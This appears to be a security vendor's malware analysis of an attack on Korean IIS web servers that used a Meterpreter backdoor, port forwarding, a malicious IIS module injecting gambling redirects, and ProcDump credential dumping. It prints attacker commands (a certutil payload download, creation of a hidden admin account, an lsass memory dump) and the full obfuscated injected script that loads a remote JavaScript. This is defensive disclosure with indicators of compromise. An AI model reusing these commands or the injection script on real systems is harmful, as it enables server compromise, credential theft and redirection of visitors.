- AhnLab Security Intelligence Center (ASEC) confirmed the distribution of malicious code that induces illegal gambling advertising site connections targeting domestic web servers.
- The attacker infiltrated the poorly managed domestic Windows IIS (Internet Information Services) web server and stole the server’s credentials using Meterpreter backdoor, port forwarding tools, IIS module malware tools, and ProcDump.
- IIS modules are extensions that support web server functions such as authentication, HTTP response, and logging. Modules can be developed using ISS C++ API or ASP.NET 2.0 API.
- The discovered IIS module malware is designed to…
AhnLab SEcurity intelligence Center (ASEC) confirmed the distribution of malware that induces connections to illegal gambling advertising sites targeting domestic web servers. After first infiltrating an improperly managed domestic Windows Internet Information Services (IIS) web server, the attacker installed a meterpreter backdoor, a port forwarding tool, an IIS module malware tool, and stole the server’s credentials using ProcDump. The IIS module is a module that supports extended functions of the web server, such as authentication, HTTP response, and logging. Module development is possible using the ISS C++ API or ASP.NET 2.0 API.
The IIS module malware identified this time monitors the string in the HTTP header for the web server where the module is installed and sends a modified response value under certain conditions to expose illegal gambling site advertisements on domestic and Chinese search portal sites. And when the user clicks on the link, it performs a function that leads to a connection to an illegal gambling site.
1. Meterpreter backdoor
The attacker ran various normal utilities such as ipconfig and systeminfo before installing the meterpreter backdoor on the web server. This appears to be intended for the attacker to collect information about the attack target before installing the IIS module malware. [Table 1] below shows the commands used by the attacker according to the timeline.
| Command execution time | CMD run command |
|---|---|
| 2024.04.09 03:43:12 | ipconfig |
| 2024.04.09 03:45:32 | systeminfo |
| 2024.04.09 03:45:49 | whoami |
| 2024.04.09 03:56:20 | powershell whoami |
| 2024.04.09 04:17:13 | hostname |
| 2024.04.09 04:17:21 | net1 user |
| 2024.04.09 04:17:42 | query user |
| 2024.04.09 04:22:10 | ping 45.154.12.215 |
| 2024.04.09 04:23:18 | curl |
| 2024.04.09 04:23:56 | certutil |
| 2024.04.09 04:28:20 | certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt |
| 2024.04.09 04:32:20 | %ALLUSERSPROFILE%\xx.txt |
[Table 1] Commands used by attacker (1)
The meterpreter backdoor is executed by receiving the attacker’s IP and port number. As a result of analyzing the backdoor code, it is presumed that the attacker communicated with the server and received and executed the shellcode.
2. HTran (port forwarding tool)
After installing the Meterpreter backdoor, the attacker additionally installed the HTran utility through the w3wp.exe process. HTran is a port forwarding tool whose source code is available on Github. Port forwarding is a function that forwards data received through a specific port to another port. It can be used in various ways depending on the attacker, but in most cases where HTran is used, it is known to be mainly used for remote communication through the RDP port.
After installing the Meterpreter backdoor and the HTran port forwarding tool, the attacker created an attacker account using the net command to maintain continuity and secure a base on the target system. Therefore, even if the attacker does not have the credentials of the target web server, he or she will be able to easily access the web server from the outside because he or she has created an attacker account.
| Command execution time | CMD run command (add account) |
|---|---|
| 2024.04.09 05:04:51 | net user kr$ test123!@# /add |
[Table 2] Commands used by attackers (2)
From initial access to the attack target to securing a base and maintaining continuity, it took less than two hours to take control of the web server. The attacker created IIS module malware after maintaining persistence.
3. IIS module malware
Generally, IIS modules exist in DLL form in the C:\Windows\System32\inetsrv path and are loaded and run in w3wp.exe, an IIS worker process. In order to load and operate in w3wp.exe, the IIS C++ API must be used and RegisterModule must be included in the Export function. And when the module operates, information about the HTTP header requested by the IIS web server is delivered to the event handler that exists in RegisterModule. At this time, each handler can process requests for HTTP headers. The discovered malicious code inserted malicious code into the OnSendResponse handler among several handler values, causing the malicious handler (sub_7FFB3DB7E840) to be executed whenever the SendResponse event of the IIS web server occurred.
OnSendResponse
-> Represents the method that will handle a SendResponse event, which occurs when IIS sends the response buffer.
The installed malicious code manipulates response values for HTTP header information requested from the web server. Check the web page inflow path by referring to the User-Agent, Referer, etc. values of the received HTTP header, and if it contains a string related to a specific search portal site, the response value to the request is not a normal web page, but related to online illegal gambling. The page was accessed.
When searching for information about compromised domestic websites on a portal search site, pages related to illegal online gambling are exposed, as shown in [Figure 7] below.
In order for a website to be exposed to search portal sites, the web server must be exposed to search engines. When a search engine accesses a web page and collects information, the search engine’s HTTP header information is transmitted to the web server, and if the header value matches a specific keyword, the malicious code determines that the search engine is requesting access and conducts online illegal activities. The meta tag information of the gambling page’s Title, Keyword, and Description is transmitted to the search engine.
As a result, pages related to illegal online gambling are exposed even when searching for normal sites on portal sites. The information below explains the search engine and other major functions verified by the malware.
[1] If a specific keyword is matched, send a script response connecting to “hxxps://ll.olacityviet.com/av.js”
Check whether the User-Agent header includes the keyword below
– naver|sogou|360|yisou|daum
Check whether the keyword below is included in the |google|coccoc Referer header
– naver.com|so.com|sogou.com|sm.cn|daum.net|google|coccoc
[2] Stealing cookie information from HTTP header
The obfuscation script code below is the response value for HTTP access and is inserted by malicious code into the normal response value. The code connects users to the address of an illegal online gambling site.
<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
e = function(c) {
return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [function(e) {
return r[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--)
if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|ll.olacityviet|com|av|js|split'.split('|'), 0, {})) </script>The decryption code is as follows.
document.write('<script src="hxxps://ll.olacityviet.com/av[.]js"></script>');Currently, it links to a page related to illegal online gambling, but special caution is required as other malicious actions may be performed depending on the response script.
4. Circumstances of ProcDump abuse
After installing the IIS module malware, the attacker used Procdump to dump the lsass.exe process memory of the current web server. This is an act of stealing credential information similar to Mimikatz, and is presumed to have been used to move laterally to another server connected to the web server.
| Command execution time | CMD run command |
|---|---|
| 2024.04.10 00:20:44 | %ALLUSERSPROFILE%\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip |
[Table 3] Commands used by attacker (3)
5. Conclusion
The attacker initially attempted to infiltrate an improperly managed Windows web server and later obtained credential information to secure a foothold, maintain continuity, achieve goals, and move laterally. Nowadays, you can easily check the IP, port, services in use, and operating system information of devices connected to the Internet around the world using search engines such as Shodan and FOFA. It is assumed that attackers will also search for attack targets through these search engines. Therefore, corporate security personnel must identify assets that can be exposed to attackers through attack surface management and continuously manage the latest security patches.
File Diagnostic
Meterpreter Backdoor
– Trojan/Win.Meterpreter.C644410 (2024.04.09.02)
IIS module malware (x64)
– Trojan/Win.Generic.C5408521 (2023.04.10.02)
IIS module malware (x86)
– Trojan/Win.Backdoor.C578523 (2023.01.18.03)
IoC
MD5
meterpreter backdoor
– d5312ab7f01fd74d399c392effdfe437
IIS module malware (x64)
– ebeb931a6dd91a227225f0ff92142f2b
IIS module malware (x86)
– 28dd72e322f6be382dac4fa9eb5cd09b
C&C Address
Meterpreter Backdoor C&C Address
– 43.156.50[.]76
Address related to online illegal gambling connection
– hxxp://ll.olacityviet[.]com
– hxxp://jsc.olacityviet[.]com
– hxxps:// ll.olacityviet[.]com/av.js